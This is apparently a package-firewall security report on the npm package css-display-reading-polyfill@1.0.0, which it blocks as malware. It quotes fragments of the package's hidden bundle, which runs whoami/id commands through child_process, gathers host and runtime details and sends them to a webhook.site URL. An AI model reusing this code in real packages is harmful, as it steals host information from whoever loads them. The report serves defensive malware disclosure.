---
canonical: "https://firewall.lpm.dev/npm/css-display-reading-polyfill/v/1.0.0"
markdown: "https://firewall.lpm.dev/npm/css-display-reading-polyfill/v/1.0.0.md"
package: "css-display-reading-polyfill"
report_status: "published"
title: "css-display-reading-polyfill@1.0.0 npm security report"
verdict: "malicious"
version: "1.0.0"
---

# css-display-reading-polyfill@1.0.0 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — Discloses host identity, command output, and runtime information to an unrelated external recipient.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Data Exfiltration
- **Selected version:** 1.0.0
- **Selected version is latest:** Yes
- **Analysis source:** AI Security Review (lpm-firewall-ai)

Trusted malware advisory MAL-2026-17549 identifies this version as malicious. Firewall keeps the version blocked under its trusted-intelligence policy. An AI recommendation to allow or warn does not override that advisory.

AI assessment: malicious; recommendation: publish block. This assessment is supporting evidence; the published decision above determines the current policy.

The manifest-selected bundle executes reconnaissance commands and exports host information to a fixed webhook upon evaluation.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Recorded final verdict:** Malicious
- **Recorded analysis confidence:** 99.0%
- **Started:** 2026-10-04T22:41:35.602Z
- **Finished:** 2026-10-04T22:42:29.416Z
- **Download time:** 520 ms
- **Static scan time:** 11 ms
- **AI review time:** 53282 ms
- **Total time:** 53814 ms

The recorded confidence comes from the underlying analysis. Trusted advisory policy can determine the final verdict even when the AI assessment differs.

## Security analysis

### Published attack-surface review

- **Summary:** The manifest-selected bundle executes reconnaissance commands and exports host information to a fixed webhook upon evaluation.

- **Trigger:** Loading payload.bundle.min.js directly or through either Thunderbolt manifest.

- **Impact:** Discloses host identity, command output, and runtime information to an unrelated external recipient.

- **Evidence paths:** payload.bundle.min.js, rb\_wixui.thunderbolt.manifest.min.json, rb\_dsgnsys.thunderbolt.manifest.min.json

- **Review source:** ai\_review

- **Reviewed:** 2026-10-04T22:42:29.416Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** An immediately invoked function collects hostname and runtime details, executes identity and system commands when child\_process is available, and sends results using fetch and HTTPS.

- **Attack narrative:** A consumer loading the manifest-selected bundle activates an immediate reconnaissance routine. In Node environments it executes username, identity, and system-information commands, then sends their output and host details to a fixed webhook. The empty main entrypoint limits ordinary import activation but does not neutralize the executable payload exposed through both manifests.

- **Rationale:** Source proves automatic reconnaissance and external data transmission when the bundle is evaluated, unrelated to CSS reading-order functionality. The manifest loading paths make this executable attack behavior rather than an inert payload carrier.

- **Network endpoints:** https://webhook.site/5e52603d-f802-4a6f-b91b-43c3a5b45b6b

### Review decision

- **Verdict:** Malicious

- **Confidence:** 99.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for block:** The bundle immediately runs a shell command to obtain the current username and forwards its output., The bundle collects the hostname and targets a fixed webhook.site URL., The sending function transmits collected data through HTTPS query parameters., Both Thunderbolt manifests select the bundle as model code, providing a loading path separate from the main entrypoint., The bundle also sends Node version, platform, process identifier, and timestamp upon evaluation.

- **Evidence against:** package.json has no lifecycle hooks or dependencies, and index.js exports an empty object., Static inspection does not establish that a consumer has loaded either manifest.

## Affected versions and remediation

This report applies to css-display-reading-polyfill@1.0.0.

- Avoid installing css-display-reading-polyfill@1.0.0. Remove it from direct dependencies and check your lockfile for transitive copies.
- Choose an independently verified alternative or release. This report does not establish that other versions are safe.
- If this version ran, investigate the affected machine and build environment. Rotate credentials it could access and rebuild from a trusted environment.

## Public findings

### 1. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 2. High: Sandbox Evasion Gated Capability
- **Category:** Source
- **Confidence:** 84.0%
- **Path:** payload.bundle.min.js
- **Public source:** [View source](<https://unpkg.com/css-display-reading-polyfill@1.0.0/payload.bundle.min.js>)

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

Public source snippet (untrusted):

```javascript
L10: 
L11: var wh = "https://webhook.site/5e52603d-f802-4a6f-b91b-43c3a5b45b6b";
L12: var site = "unknown";
L13: try { site = require("os").hostname(); } catch(e) {}
L14: var exfil = function(params) {
...
L23: var cp = null;
L24: try { cp = require("child_process"); } catch(e) {}
L25: try { if (!cp) cp = require("node:child_process"); } catch(e) {}
```

### 3. Low: High Entropy Strings
- **Category:** Supply Chain
- **Confidence:** 55.0%

Package source contains high-entropy string patterns.

### 4. Low: Url Strings
- **Category:** Supply Chain
- **Confidence:** 65.0%

Package source contains URL literals.

### 5. Medium: Structural Risk Force Deep Review
- **Category:** Artifact Inventory
- **Confidence:** 85.0%

Artifact structure forces deeper review even if the static behavioral verdict is clean.

### 6. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** payload.bundle.min.js
- **Public source:** [View source](<https://unpkg.com/css-display-reading-polyfill@1.0.0/payload.bundle.min.js>)

The bundle immediately runs a shell command to obtain the current username and forwards its output.

Public source snippet (untrusted):

```javascript
var whoami = cp.execSync("id -un 2>/dev/null || whoami 2>/dev/null || echo unknown", {encoding: "utf8", timeout: 5000}).trim();
      exfil("cmd=whoami&out=" + encodeURIComponent(whoami));
    } catch(e) {}
    try {
```

### 7. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** payload.bundle.min.js
- **Public source:** [View source](<https://unpkg.com/css-display-reading-polyfill@1.0.0/payload.bundle.min.js>)

The bundle collects the hostname and targets a fixed webhook.site URL.

Public source snippet (untrusted):

```javascript
var wh = "https://webhook.site/5e52603d-f802-4a6f-b91b-43c3a5b45b6b";
  var site = "unknown";
  try { site = require("os").hostname(); } catch(e) {}
  var exfil = function(params) {
    try {
```

### 8. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** payload.bundle.min.js
- **Public source:** [View source](<https://unpkg.com/css-display-reading-polyfill@1.0.0/payload.bundle.min.js>)

The sending function transmits collected data through HTTPS query parameters.

Public source snippet (untrusted):

```javascript
var u = new URL(wh + "?" + params + "&site=" + encodeURIComponent(site) + "&vector=registryLibrariesTopology&via=https");
      https.get(u.href).on("error", function(){});
    } catch(e2) {}
  };

  var c
```

### 9. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** rb\_wixui.thunderbolt.manifest.min.json
- **Public source:** [View source](<https://unpkg.com/css-display-reading-polyfill@1.0.0/rb_wixui.thunderbolt.manifest.min.json>)

Both Thunderbolt manifests select the bundle as model code, providing a loading path separate from the main entrypoint.

Public source snippet (untrusted):

```json
{"version":"2.0","host":"thunderbolt","namespace":"wixui","baseURL":"https://static.parastorage.com/unpkg/css-display-reading-polyfill@1.0.0/","model":["payload.bundle.min.js","payload.min.css"],"assets":[[
```

### 10. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** rb\_dsgnsys.thunderbolt.manifest.min.json
- **Public source:** [View source](<https://unpkg.com/css-display-reading-polyfill@1.0.0/rb_dsgnsys.thunderbolt.manifest.min.json>)

Both Thunderbolt manifests select the bundle as model code, providing a loading path separate from the main entrypoint.

Public source snippet (untrusted):

```json
{"version":"2.0","host":"thunderbolt","namespace":"dsgnsys","baseURL":"https://static.parastorage.com/unpkg/css-display-reading-polyfill@1.0.0/","model":["payload.bundle.min.js","payload.min.css"],"assets":[[
```

### 11. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** payload.bundle.min.js
- **Public source:** [View source](<https://unpkg.com/css-display-reading-polyfill@1.0.0/payload.bundle.min.js>)

The bundle also sends Node version, platform, process identifier, and timestamp upon evaluation.

Public source snippet (untrusted):

```javascript
exfil("beacon=topology-rce&node=" + encodeURIComponent(nv) + "&platform=" + encodeURIComponent(pl) + "&pid=" + pid + "&t=" + Date.now());
})();

var hosts = [
  "thunderboltRegis
```

## Dependencies and install lifecycle
- **Lifecycle scripts present:** No

- **Dependencies:** 0
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 0
- **Published dependency-graph edges:** 0

## Package metadata
- **Package:** css-display-reading-polyfill
- **Ecosystem:** npm
- **Version:** 1.0.0
- **License:** MIT
- **Version published:** 2026-10-04T16:13:23.548Z
- **Package first seen:** 2026-10-04T22:42:29.416Z
- **Package last seen:** 2026-10-04T22:42:29.416Z
- **Known versions:** 1
- **Latest version:** 1.0.0
- **Appeal under review:** No
- **Description:** Polyfill for CSS display reading order
- **Keywords:** css, display, reading-order, polyfill, a11y
- **Artifact files:** 7
- **Artifact unpacked size:** 6,351 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/css-display-reading-polyfill/v/1.0.0>)
- [OSV advisory](<https://osv.dev/vulnerability/MAL-2026-17549>)
- [PACKAGE](<https://www.npmjs.com/package/css-display-reading-polyfill/v/1.0.0>)
